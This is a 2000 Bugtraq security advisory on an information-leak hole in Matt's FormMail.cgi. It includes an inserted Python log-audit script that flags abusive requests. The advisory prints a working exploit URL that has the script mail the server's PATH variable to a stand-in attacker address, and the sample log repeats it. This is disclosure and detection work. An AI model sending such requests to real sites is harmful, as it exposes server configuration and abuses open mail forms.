Date:         Wed, 10 May 2000 16:11:23 -0700
From: Black Watch Labs <blackwatchlabs@PERFECTOTECH.COM>
Subject:      Black Watch Labs Vulnerability Alert
To: BUGTRAQ@SECURITYFOCUS.COM

Dear Security Professional,

The following vulnerability:

    "Environment and setup variables can be viewed through FormMail script"

is in the text of the message below and has just been posted to the
Black Watch Labs Web site at
http://www.perfectotech.com/blackwatchlabs/

Thank you,
Black Watch Labs

If you wish to unsubscribe from this Black Watch Labs email update,
please click on reply and type the word "Unsubscribe" in the subject line.


--------------------------------------------------------------------------------------------------------------------------------

Environment and setup variables can be viewed through FormMail script

Perfecto’s Black Watch Labs Advisory BWL 00-06 (May 10, 2000)



Name:
Environment and setup variables can be viewed through FormMail script


Black Watch Labs ID:
BWL 00-06


Date Released:
May 10, 2000


Products affected:
Matt’s FormMail.cgi


Number of affected sites:
It is estimated that there are thousands of pages containing links to
the formmail script.


Category:
Application(HTML): modification of parameters, debug options.


Summary:
The script allows several environment variables to be viewed by the
attacker, who can gain useful information on the site, making further
attacks more feasible.


Analysis:
FormMail contains a debug field named “env_report”, whose value is a
comma-separated list of environment variable names (read via
$ENV{name}). The values of these variables (if they exist) are embedded
in the message body. Furthermore, the script does not validate the
recipient field, so an attacker can set it to an address of their own
and the message, including the environment information, is delivered to
the attacker’s account.


Exploits:
FormMail: assume the URL for the script is
http://www.formmail.site/cgi-bin/formmail.cgi. To have the value of the
PATH environment variable sent to the account attacker@attacker.site, it
is enough to request the following URL:

http://www.formmail.site/cgi-bin/formmail.cgi?env_report=PATH&recipient=attacker@attacker.site&required=&firstname=&lastname=&email=&message=&Submit=Submit




Vendor Patch or workaround:
None submitted at the time of this release.
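
A log check for the two conditions described in the Analysis, added here as an example (it is not part of the Black Watch Labs advisory or of FormMail): it flags requests to the script whose env_report names a variable outside an allowlist, or whose recipient lies outside the site's own mail domain. The allowlists, the function names and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed site policy (hypothetical values): the only domain the form may
# deliver to, and the environment variables it is allowed to report.
ALLOWED_RECIPIENT_DOMAINS = {"formmail.site"}
ALLOWED_ENV_REPORT = {"REMOTE_HOST", "HTTP_USER_AGENT"}
# Script names to watch; adjust to the local install.
SCRIPT_NAMES = ("formmail.cgi", "formmail.pl")

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def audit_line(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(SCRIPT_NAMES):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    # env_report is a comma-separated list of environment variable names.
    for value in params.get("env_report", []):
        for name in filter(None, (v.strip() for v in value.split(","))):
            if name not in ALLOWED_ENV_REPORT:
                findings.append(f"env_report requests {name}")
    # A client-supplied recipient must stay inside the site's own domains.
    for value in params.get("recipient", []):
        for addr in filter(None, (a.strip() for a in value.split(","))):
            domain = addr.rpartition("@")[2].lower()
            if domain not in ALLOWED_RECIPIENT_DOMAINS:
                findings.append(f"recipient outside allowed domains: {addr}")
    return findings

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2000:16:20:01 -0700] "GET /cgi-bin/formmail.cgi?recipient=webmaster@formmail.site&email=a@example.org&message=hi HTTP/1.0" 200 512',
    '192.0.2.77 - - [10/May/2000:16:21:44 -0700] "GET /cgi-bin/formmail.cgi?env_report=PATH&recipient=attacker@attacker.site&required= HTTP/1.0" 200 498',
    '192.0.2.10 - - [10/May/2000:16:22:03 -0700] "GET /index.html HTTP/1.0" 200 2048',
]

def audit(lines):
    """Map line number -> findings for every line that has any."""
    return {i: f for i, line in enumerate(lines, 1) if (f := audit_line(line))}

if __name__ == "__main__":
    for lineno, findings in audit(SAMPLE_LOG).items():
        print(lineno, findings)
```

Form fields submitted by POST do not appear in a standard access log, so the same two checks belong in the script or in a filter in front of it as well.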


References and Links:
Matt’s Script Archive (FormMail):
http://www.worldwidemart.com/scripts/formmail.shtml


About Black Watch Labs (www.perfectotech.com/blackwatchlabs/)
Black Watch Labs is a research group operated by Perfecto Technologies
Inc., leader in Web application security management. Black Watch Labs
was established in order to further the knowledge of the Internet
community in the arena of Web application security management. Black
Watch Labs publishes security advisories regularly, which are maintained
at http://www.perfectotech.com/blackwatchlabs/, and are also posted to
relevant security lists and websites.  Black Watch Labs also operates a
Web application security mailing list, which can be subscribed to at
http://www.perfectotech.com/blackwatchlabs/.
For more info about Black Watch Labs and Web Application Security
Management, please call (408) 855-9500 or email
BlackWatchLabs@perfectotech.com


About Perfecto Technologies (www.perfectotech.com)
Founded in 1997 and headquartered in Santa Clara, Calif., Perfecto
Technologies pioneered the market for Web Application Security
Management software.  AppShield, Perfecto Technologies' flagship product
offering, is the first to provide extreme security for customer-facing
applications in dynamic Web site environments.  Perfecto Technologies
has customers in many sectors including banking, etailing, finance,
government, and healthcare.  Privately held, Perfecto Technologies is
funded by blue-chip venture capital firms and industry leaders,
including Sequoia Capital, Walden, and Intel Corporation.  More
information about Perfecto Technologies may be obtained by visiting the
Company’s Website at www.perfectotech.com or by calling the Company
directly at (408) 855-9500.


Copyright © 1997-2000 Perfecto Technologies LTD. All rights reserved.
Permission is hereby granted to reproduce and distribute the application
security alerts herein in their entirety, provided the information, this
notice and all other Perfecto Technologies marks remain intact.


Specific Limitations on Use of the Black Watch Labs Advisories
THIS ADVISORY INCLUDES INFORMATION WHICH WILL ILLUSTRATE CERTAIN
SECURITY RISKS AND ISSUES ASSOCIATED WITH SITES ON THE INTERNET,
INCLUDING, POTENTIALLY, YOUR SITE. YOU AGREE THAT YOUR VIEWING OF THIS
ADVISORY IS SOLELY FOR THE PURPOSES OF UNDERSTANDING THESE RISKS AND
ISSUES WITH RESPECT TO YOUR SITE AND THE PRODUCTS AND SERVICES OFFERED
BY PERFECTO TECHNOLOGIES. YOU AGREE NOT TO USE ANY INFORMATION DISCLOSED
TO YOU FOR ANY IMPROPER OR ILLEGAL PURPOSE, INCLUDING TO VIOLATE THE
SECURITY OF ANY OTHER PERSON'S SITE. YOU ARE EXPLICITLY WARNED THAT THE
USE FOR ANY IMPROPER PURPOSE OF INFORMATION DISCLOSED TO YOU COULD
SUBJECT YOU TO CIVIL AND CRIMINAL LIABILITY IN THE UNITED STATES AND
OTHER COUNTRIES.


NO WARRANTY
Any material furnished by Perfecto Technologies is furnished on an “as
is” basis and may change without notice. Perfecto Technologies makes no
warranties of any kind, either expressed or implied as to any matter
including but not limited to, warranty of fitness for a particular
purpose or merchantability, exclusivity or results obtained from use of
the material.  Neither does Perfecto Technologies make any warranty of
any kind with respect to freedom from patent, trademark or copyright
infringement. In no event shall Perfecto Technologies be liable for any
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.